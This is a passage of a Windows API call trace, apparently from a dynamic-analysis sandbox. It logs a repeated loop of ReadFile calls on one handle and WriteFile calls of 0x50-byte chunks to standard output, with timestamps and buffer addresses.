lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3f8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] GetFileType (hFile=0x4c) returned 0x1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] WriteFile (in: hFile=0x4c, lpBuffer=0x18f448*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f448*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] GetFileType (hFile=0x4c) returned 0x1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] WriteFile (in: hFile=0x4c, lpBuffer=0x18f498*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f498*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] GetFileType (hFile=0x4c) returned 0x1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4e8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f4e8*, lpNumberOfBytesWritten=0x18e4ec*=0x20, lpOverlapped=0x0) returned 1 [0142.295] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.295] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.295] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.295] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x200, lpOverlapped=0x0) returned 1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] GetFileType (hFile=0x4c) returned 0x1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] GetFileType (hFile=0x4c) returned 0x1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] GetFileType (hFile=0x4c) returned 0x1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] WriteFile (in: hFile=0x4c, lpBuffer=0x18f358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f358*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] GetFileType (hFile=0x4c) returned 0x1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3a8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] GetFileType (hFile=0x4c) returned 0x1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3f8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] GetFileType (hFile=0x4c) returned 0x1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] WriteFile (in: hFile=0x4c, lpBuffer=0x18f448*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f448*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] GetFileType (hFile=0x4c) returned 0x1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] WriteFile (in: hFile=0x4c, lpBuffer=0x18f498*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f498*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] GetFileType (hFile=0x4c) returned 0x1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4e8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f4e8*, lpNumberOfBytesWritten=0x18e4ec*=0x20, lpOverlapped=0x0) returned 1 [0142.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.296] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.296] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x200, lpOverlapped=0x0) returned 1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] GetFileType (hFile=0x4c) returned 0x1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] GetFileType (hFile=0x4c) returned 0x1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] GetFileType (hFile=0x4c) returned 0x1 [0142.296] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.296] WriteFile (in: hFile=0x4c, lpBuffer=0x18f358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f358*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.297] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.297] GetFileType (hFile=0x4c) returned 0x1 [0142.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.304] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3a8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.304] GetFileType (hFile=0x4c) returned 0x1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3f8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] GetFileType (hFile=0x4c) returned 0x1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] WriteFile (in: hFile=0x4c, lpBuffer=0x18f448*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f448*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] GetFileType (hFile=0x4c) returned 0x1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] WriteFile (in: hFile=0x4c, lpBuffer=0x18f498*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f498*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] GetFileType (hFile=0x4c) returned 0x1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4e8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f4e8*, lpNumberOfBytesWritten=0x18e4ec*=0x20, lpOverlapped=0x0) returned 1 [0142.305] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.305] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.305] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.305] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x200, lpOverlapped=0x0) returned 1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] GetFileType (hFile=0x4c) returned 0x1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] GetFileType (hFile=0x4c) returned 0x1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] GetFileType (hFile=0x4c) returned 0x1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] WriteFile (in: hFile=0x4c, lpBuffer=0x18f358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f358*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.305] GetFileType (hFile=0x4c) returned 0x1 [0142.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3a8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] GetFileType (hFile=0x4c) returned 0x1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3f8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] GetFileType (hFile=0x4c) returned 0x1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] WriteFile (in: hFile=0x4c, lpBuffer=0x18f448*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f448*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] GetFileType (hFile=0x4c) returned 0x1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] WriteFile (in: hFile=0x4c, lpBuffer=0x18f498*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f498*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] GetFileType (hFile=0x4c) returned 0x1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4e8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f4e8*, lpNumberOfBytesWritten=0x18e4ec*=0x20, lpOverlapped=0x0) returned 1 [0142.306] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.306] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.306] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.306] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x200, lpOverlapped=0x0) returned 1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] GetFileType (hFile=0x4c) returned 0x1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] GetFileType (hFile=0x4c) returned 0x1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] GetFileType (hFile=0x4c) returned 0x1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.306] WriteFile (in: hFile=0x4c, lpBuffer=0x18f358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f358*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] GetFileType (hFile=0x4c) returned 0x1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3a8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] GetFileType (hFile=0x4c) returned 0x1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3f8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] GetFileType (hFile=0x4c) returned 0x1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] WriteFile (in: hFile=0x4c, lpBuffer=0x18f448*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f448*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] GetFileType (hFile=0x4c) returned 0x1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] WriteFile (in: hFile=0x4c, lpBuffer=0x18f498*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f498*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] GetFileType (hFile=0x4c) returned 0x1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4e8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f4e8*, lpNumberOfBytesWritten=0x18e4ec*=0x20, lpOverlapped=0x0) returned 1 [0142.307] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.307] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.307] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.307] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x200, lpOverlapped=0x0) returned 1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] GetFileType (hFile=0x4c) returned 0x1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] GetFileType (hFile=0x4c) returned 0x1 [0142.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.307] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] GetFileType (hFile=0x4c) returned 0x1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] WriteFile (in: hFile=0x4c, lpBuffer=0x18f358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f358*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] GetFileType (hFile=0x4c) returned 0x1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3a8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] GetFileType (hFile=0x4c) returned 0x1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3f8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] GetFileType (hFile=0x4c) returned 0x1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] WriteFile (in: hFile=0x4c, lpBuffer=0x18f448*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f448*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] GetFileType (hFile=0x4c) returned 0x1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] WriteFile (in: hFile=0x4c, lpBuffer=0x18f498*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f498*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] GetFileType (hFile=0x4c) returned 0x1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4e8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f4e8*, lpNumberOfBytesWritten=0x18e4ec*=0x20, lpOverlapped=0x0) returned 1 [0142.308] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.308] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.308] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.308] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x200, lpOverlapped=0x0) returned 1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] GetFileType (hFile=0x4c) returned 0x1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.308] GetFileType (hFile=0x4c) returned 0x1 [0142.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] GetFileType (hFile=0x4c) returned 0x1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] WriteFile (in: hFile=0x4c, lpBuffer=0x18f358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f358*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] GetFileType (hFile=0x4c) returned 0x1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3a8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] GetFileType (hFile=0x4c) returned 0x1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3f8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] GetFileType (hFile=0x4c) returned 0x1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] WriteFile (in: hFile=0x4c, lpBuffer=0x18f448*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f448*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] GetFileType (hFile=0x4c) returned 0x1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] WriteFile (in: hFile=0x4c, lpBuffer=0x18f498*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f498*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] GetFileType (hFile=0x4c) returned 0x1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4e8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f4e8*, lpNumberOfBytesWritten=0x18e4ec*=0x20, lpOverlapped=0x0) returned 1 [0142.309] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.309] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.309] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.309] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x200, lpOverlapped=0x0) returned 1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] GetFileType (hFile=0x4c) returned 0x1 [0142.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.309] GetFileType (hFile=0x4c) returned 0x1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] GetFileType (hFile=0x4c) returned 0x1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18f358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f358*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] GetFileType (hFile=0x4c) returned 0x1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3a8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] GetFileType (hFile=0x4c) returned 0x1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3f8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] GetFileType (hFile=0x4c) returned 0x1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18f448*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f448*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] GetFileType (hFile=0x4c) returned 0x1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18f498*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f498*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] GetFileType (hFile=0x4c) returned 0x1 [0142.310] 